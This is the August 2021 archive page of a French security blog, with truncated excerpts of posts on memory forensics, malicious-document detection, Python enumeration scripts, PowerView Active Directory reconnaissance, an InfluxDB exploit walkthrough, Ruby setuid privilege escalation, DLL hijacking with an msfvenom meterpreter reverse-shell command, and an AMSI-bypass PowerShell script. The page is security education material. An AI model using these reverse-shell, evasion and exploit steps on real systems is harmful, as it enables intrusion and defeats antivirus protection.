Sécuriser votre site

Connaître son ennemi
Menu
  • Active Directory
  • Aide-mémoire
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
    • Analyse
    • VM
  • Windows
  • Windows Server

Mois : août 2021

Environnements virtuels dans Python

Environnements virtuels dans Python

python3 -m pip install virtualenv mkdir virtual-demo cd virtual-demo python3 -m venv env source env/bin/activate which python3 which pip pip freeze deactivate
Full Article
Pas de commentaire
Déterminer si un système est infecté en analysant la mémoire avec volatility

Déterminer si un système est infecté en analysant la mémoire avec volatility

Quelque outils permettent d’avoir un image de la mémoire FTK Image Redline DumpIt.exe win32dd.exe / win64dd.exe (support psexec) Ces outils permettent d’avoir un format raw de la mémoire. Sur windows, vous avez aussi le fichier d’hibernation %SystemDrive%/hiberfil.sys qui est une image compressée. Pour les machines virtuelles …
Full Article
Pas de commentaire
Scripts python pour l’énumération

Scripts python pour l’énumération

Énumération des sous-domaines import requests import sys sub_list = open("subdomains.txt").read() subdoms = sub_list.splitlines() for sub in subdoms:     sub_domains = f"http://{sub}.{sys.argv}"     try:         requests.get(sub_domains)          except requests.ConnectionError:         pass          else:         print("Valid domain: ",sub_domains)   Énumération des répertoires import requests import sys sub_list = open("wordlist.txt").read() directories = sub_list.splitlines() for dir …
Full Article
Pas de commentaire
Powerview

Powerview

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 powershell Import-Module .\powerview.ps1 Get-NetDomainController (Get-NetUser).name Get-NetUser | select -ExpandProperty lastlogon Get-NetUser -Domain searchevolution.local Get-NetUser -UACFilter ACCOUNTDISABLE #liste les comptes bloqués Get-NetUser -properties Get-NetComputer Get-NetGroup Get-NetGroupMember “Domain Admins” Get-NetShare Find-DomainShare -CheckShareAccess : Liste les partages lisibles Get-NetGPO Get-NetUser | select -ExpandProperty lastlogon Get-NetDomainTrust #liste les domaines …
Full Article
Pas de commentaire
Aide-Mémoire volatility

Aide-Mémoire volatility

volatility utilise python2 git clone https://github.com/volatilityfoundation/volatility.git python2 -m pip install pycrypto python2 -m pip install distorm3 python2 vol.py Si on a un image mémoire inconnu volatility -f Win7-Jigsaw.raw imageinfo on regarde Suggested Profile(s) Liste les processsus volatility -f Win7-Jigsaw.raw –profile=Win7SP1x64 pslist Liste les dll utilisés par …
Full Article
Pas de commentaire
Détecter du code malicieux dans des .pdf et des .doc

Détecter du code malicieux dans des .pdf et des .doc

Peepdf permet l’extraction des codes javascript des fichiers pdf git clone https://github.com/jesparza/peepdf.git python2 peepdf.py echo 'extract js > mypdf.txt' > extracted_javascript.txt peepdf -s extracted_javascript.txt mypdf.pdf vmonkey permet d’extraire les scripts malicieux des documents office. Il utilise python2 mais appelle des scripts en python3… pip2 install virtualenv …
Full Article
Pas de commentaire
Exploit InfluxDB 1.30

Exploit InfluxDB 1.30

Il y a un bug dans InfluxDB et nous pouvons trouver le nom d’un usager en visitant le URL http://10.10.169.83:8086/debug/requests Nous pouvons utiliser le script https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 pour nous créer un token et accéder à la base de données show databases show tag keys on creds #creds …
Full Article
Pas de commentaire
Obtenir le compte administrateur avec Ruby

Obtenir le compte administrateur avec Ruby

On se rend compte avec linPEAS que Ruby a les capabilities setuid On peut facilement obtenir le compte de l’administrateur. Si Ruby a été protégé avec apparmor pour ne pouvoir exécuter que quelques utilitaires et avoir accès qu’à certains fichiers #include <tunables/global> /usr/bin/ruby2.5 {   #include <abstractions/base> …
Full Article
Pas de commentaire
DLL Hijacking

DLL Hijacking

Étapes pour réussir l’injection de DLL sous windows Identifier l’application vulnérable et son emplacement Identifer le ID du processus Identifier les DLL vulnérables qui peuvent être hijackés Remplacer la DLL d’origine Génération d’une DLL pour création d’une session meterpreter sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f …
Full Article
Pas de commentaire
Modifier du code pour s’évader de l’antivirus

Modifier du code pour s’évader de l’antivirus

Ce script permet de désactiver AMSI //bypass.ps1 $MethodDefinition = "          public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);          public static extern IntPtr GetModuleHandle(string lpModuleName);          public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); "; $Kernel32 = Add-Type -MemberDefinition $MethodDefinition …
Full Article
Pas de commentaire

Navigation des articles

1 2 Next

Articles populaires

blogs chercher de façon différente code Enfants engin de recherche engins de recherche entreprises fils de discussion flare forums inetsim InfluxDB installation IOT' internet des objets kids meta médias sociaux OSINT pays personnes programmation recherche REMnux semblable site sock puppet xclip

  • Active Directory
  • Aide-mémoire
  • Analyse
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
  • VM
  • Windows
  • Windows Server

Articles récents

  • L’importance de la sécurité informatique dans une petite entreprise
  • L’importance d’embaucher un spécialiste de la sécurité informatique
  • L’importance de la sécurité informatique dans une petite et moyenne entreprise
  • Activation des journaux (logs) de Windows pour la détection de virus en mémoire
  • Engin de recherche pour le contenu sur telegram

Archives

  • février 2023
  • novembre 2022
  • juillet 2022
  • avril 2022
  • mars 2022
  • septembre 2021
  • août 2021
  • juillet 2021
  • juin 2021
  • mai 2021

Sécuriser votre site

Connaître son ennemi
Copyright © 2023 Sécuriser votre site
Article par

Ad Blocker Detected

Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by disabling your ad blocker.

Refresh
Gérer le consentement aux témoins
Nous utilisons des technologies telles que les témoins pour stocker et/ou accéder aux informations relatives aux appareils. Nous le faisons pour améliorer l’expérience de navigation et pour afficher des publicités personnalisées. Consentir à ces technologies nous permettra de traiter des données telles que le comportement de navigation ou les identifiants uniques sur ce site. Le fait de ne pas consentir ou de retirer son consentement peut avoir un effet négatif sur certaines fonctionnalités et caractéristiques.
Fonctionnel Toujours activé
Le stockage ou l’accès technique est strictement nécessaire dans la finalité d’intérêt légitime de permettre l’utilisation d’un service spécifique explicitement demandé par l’abonné ou l’utilisateur, ou dans le seul but d’effectuer la transmission d’une communication sur un réseau de communications électroniques.
Préférences
Le stockage ou l’accès technique est nécessaire dans la finalité d’intérêt légitime de stocker des préférences qui ne sont pas demandées par l’abonné ou l’utilisateur.
Statistiques
Le stockage ou l’accès technique qui est utilisé exclusivement à des fins statistiques. Le stockage ou l’accès technique qui est utilisé exclusivement dans des finalités statistiques anonymes. En l’absence d’une assignation à comparaître, d’une conformité volontaire de la part de votre fournisseur d’accès à internet ou d’enregistrements supplémentaires provenant d’une tierce partie, les informations stockées ou extraites à cette seule fin ne peuvent généralement pas être utilisées pour vous identifier.
Marketing
Le stockage ou l’accès technique est nécessaire pour créer des profils d’utilisateurs afin d’envoyer des publicités, ou pour suivre l’utilisateur sur un site web ou sur plusieurs sites web ayant des finalités marketing similaires.
Gérer les options Gérer les services Gérer les fournisseurs En savoir plus sur ces finalités
Voir les préférences
{title} {title} {title}